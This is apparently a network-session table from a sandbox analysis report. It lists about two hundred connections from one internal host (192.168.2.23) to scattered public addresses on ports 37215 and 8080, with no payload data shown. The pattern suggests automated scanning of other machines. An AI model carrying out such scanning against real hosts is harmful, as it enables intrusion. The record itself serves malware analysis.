                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29377192.168.2.235107441.101.227.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29378192.168.2.235895441.164.86.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29379192.168.2.2360542197.211.240.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29380192.168.2.2355542204.31.197.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29381192.168.2.2342210197.236.178.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29382192.168.2.2353954209.17.105.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29383192.168.2.2352178157.171.25.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29384192.168.2.234006041.234.36.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29385192.168.2.2344450197.195.71.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29386192.168.2.233487886.21.78.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29387192.168.2.234500241.103.198.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29388192.168.2.233980641.203.181.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29389192.168.2.234549841.62.104.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29390192.168.2.2333884157.162.15.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29391192.168.2.2354614157.163.151.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29392192.168.2.2337926196.130.64.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29393192.168.2.233484241.159.94.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29394192.168.2.234809241.63.84.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29395192.168.2.2353502134.243.248.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29396192.168.2.2355934193.159.77.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29397192.168.2.234196041.40.22.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29398192.168.2.2343552163.218.24.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29399192.168.2.234677041.95.113.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29400192.168.2.2335150197.26.132.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29401192.168.2.2355770197.158.1.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29402192.168.2.2360874152.19.76.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29403192.168.2.234678468.69.160.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29404192.168.2.2356486211.211.247.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29405192.168.2.235936491.156.120.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29406192.168.2.236031668.196.203.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29407192.168.2.233766038.135.72.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29408192.168.2.234964023.190.161.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29409192.168.2.2334876156.115.54.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29410192.168.2.2350418186.134.17.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29411192.168.2.2359574107.221.11.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29412192.168.2.235387624.112.179.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29413192.168.2.2352490138.76.32.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29414192.168.2.2335822141.134.157.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29415192.168.2.2356376141.166.224.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29416192.168.2.235809082.164.182.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29417192.168.2.2359620182.36.164.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29418192.168.2.2336224109.48.106.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29419192.168.2.2346518168.13.147.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29420192.168.2.233486294.171.160.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29421192.168.2.2356962177.116.212.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29422192.168.2.2337606117.63.165.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29423192.168.2.2350406137.185.100.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29424192.168.2.233589661.210.170.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29425192.168.2.2340384128.89.244.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29426192.168.2.2359492121.168.138.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29427192.168.2.2340274204.187.168.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29428192.168.2.234544836.173.90.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29429192.168.2.2339488206.36.54.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29430192.168.2.2354136106.19.230.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29431192.168.2.2356138134.28.55.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29432192.168.2.2336760117.163.58.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29433192.168.2.2350284109.144.85.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29434192.168.2.2343722163.113.36.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29435192.168.2.235012243.159.167.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29436192.168.2.233527898.163.47.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29437192.168.2.234640213.71.248.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29438192.168.2.2334522141.230.85.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29439192.168.2.2340746168.103.196.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29440192.168.2.2344386143.241.139.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29441192.168.2.2345428218.82.114.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29442192.168.2.2352374142.71.49.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29443192.168.2.234001086.111.115.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29444192.168.2.235604863.213.211.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29445192.168.2.233757839.147.100.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29446192.168.2.233518285.25.87.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29447192.168.2.235035876.23.67.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29448192.168.2.233823018.214.148.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29449192.168.2.2340618131.57.176.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29450192.168.2.2359250142.67.154.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29451192.168.2.2356232123.41.116.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29452192.168.2.235107085.255.91.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29453192.168.2.234480290.192.128.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29454192.168.2.236008613.25.85.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29455192.168.2.23386522.204.167.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29456192.168.2.2345508104.49.171.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29457192.168.2.233937839.143.15.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29458192.168.2.2340736206.33.38.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29459192.168.2.233774236.146.108.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29460192.168.2.2351644195.191.4.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29461192.168.2.234484278.131.183.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29462192.168.2.233512853.135.64.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29463192.168.2.2348932212.74.51.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29464192.168.2.2338746138.222.247.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29465192.168.2.235258449.81.23.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29466192.168.2.234177679.4.195.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29467192.168.2.2350818140.245.113.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29468192.168.2.2344620107.236.236.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29469192.168.2.2348018161.121.103.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29470192.168.2.2345464208.171.233.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29471192.168.2.2355494206.215.16.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29472192.168.2.2339896175.114.233.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29473192.168.2.23361189.153.250.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29474192.168.2.235494841.129.252.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29475192.168.2.234449891.223.77.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29476192.168.2.2340002125.68.189.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29477192.168.2.2344978124.27.215.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29478192.168.2.2357822191.85.31.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29479192.168.2.233653473.200.246.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29480192.168.2.234002217.161.113.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29481192.168.2.2355354147.140.26.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29482192.168.2.2349460154.92.253.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29483192.168.2.235965462.47.181.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29484192.168.2.2335748152.240.154.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29485192.168.2.2349842205.34.52.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29486192.168.2.2348670195.42.251.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29487192.168.2.235150259.53.51.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29488192.168.2.2356326212.128.43.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29489192.168.2.2356828137.15.46.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29490192.168.2.2350154201.147.57.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29491192.168.2.235717093.193.254.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29492192.168.2.234367241.214.209.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29493192.168.2.2349904182.169.210.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29494192.168.2.234265438.251.203.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29495192.168.2.23590468.63.136.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29496192.168.2.233372427.224.113.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29497192.168.2.235703425.44.86.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29498192.168.2.2345528180.151.135.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29499192.168.2.2341334200.227.115.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29500192.168.2.236035447.228.95.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29501192.168.2.234096020.135.210.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29502192.168.2.23551229.251.165.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29503192.168.2.235502842.88.102.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29504192.168.2.2343740100.226.68.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29505192.168.2.235885632.111.147.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29506192.168.2.234472425.235.112.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29507192.168.2.2334352156.185.145.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29508192.168.2.233743212.125.225.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29509192.168.2.2349392103.46.78.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29510192.168.2.23555185.221.189.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29511192.168.2.235878474.212.0.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29512192.168.2.2346332118.4.124.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29513192.168.2.234010698.112.235.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29514192.168.2.2350392219.235.229.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29515192.168.2.2348406111.50.138.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29516192.168.2.2348150192.33.111.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29517192.168.2.234956620.51.162.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29518192.168.2.2338742213.22.181.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29519192.168.2.235958819.243.212.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29520192.168.2.235030275.73.105.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29521192.168.2.2334614165.127.71.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29522192.168.2.2358706146.214.140.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29523192.168.2.2343944147.224.57.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29524192.168.2.2340678136.202.119.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29525192.168.2.2338078118.124.176.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29526192.168.2.23457949.144.119.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29527192.168.2.2333876136.42.209.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29528192.168.2.2338406198.31.95.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29529192.168.2.2343496197.223.7.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29530192.168.2.234663674.86.115.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29531192.168.2.233548614.209.211.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29532192.168.2.2350912103.8.163.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29533192.168.2.23412505.229.183.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29534192.168.2.2342696112.72.200.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29535192.168.2.2342862206.238.204.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29536192.168.2.2348640164.184.250.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29537192.168.2.235137825.179.153.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29538192.168.2.2352400192.91.172.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29539192.168.2.2341468167.202.123.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29540192.168.2.236008885.27.24.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29541192.168.2.2345202103.63.80.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29542192.168.2.2350532163.98.164.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29543192.168.2.234737844.235.195.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29544192.168.2.2350218135.104.26.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29545192.168.2.235401871.113.84.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29546192.168.2.2341006170.79.21.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29547192.168.2.2338360136.187.174.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29548192.168.2.233999698.191.130.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29549192.168.2.2335054210.247.167.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29550192.168.2.2357570139.59.162.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29551192.168.2.2337398144.24.13.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29552192.168.2.235086266.35.137.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29553192.168.2.2336876124.215.62.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29554192.168.2.2337792112.131.225.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29555192.168.2.2347818219.152.44.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29556192.168.2.2337426194.194.229.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29557192.168.2.2354740158.30.211.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29558192.168.2.2339612107.106.33.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29559192.168.2.234570886.95.45.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29560192.168.2.233594062.195.32.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29561192.168.2.2334316109.119.91.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29562192.168.2.235085635.134.51.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29563192.168.2.233686075.255.141.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29564192.168.2.2351624115.133.169.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29565192.168.2.23333181.105.15.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29566192.168.2.234333475.98.180.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29567192.168.2.236085627.32.233.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29568192.168.2.2350160190.116.129.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29569192.168.2.2348240205.231.62.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29570192.168.2.2354824179.154.29.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29571192.168.2.2350868157.75.63.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29572192.168.2.2336804174.172.127.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29573192.168.2.2356198197.112.230.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29574192.168.2.233360653.54.211.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29575192.168.2.235777841.67.26.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29576192.168.2.2345478197.151.59.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29577192.168.2.2347090197.212.138.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29578192.168.2.233608853.136.177.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29579192.168.2.233349425.214.1.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29580192.168.2.235923641.242.60.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29581192.168.2.235375041.246.255.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29582192.168.2.2351336197.64.21.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29583192.168.2.2358736157.175.134.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29584192.168.2.235446641.62.79.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29585192.168.2.2351608181.98.223.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29586192.168.2.2353216183.217.45.16037215
                                                        TimestampBytes transferredDirectionData


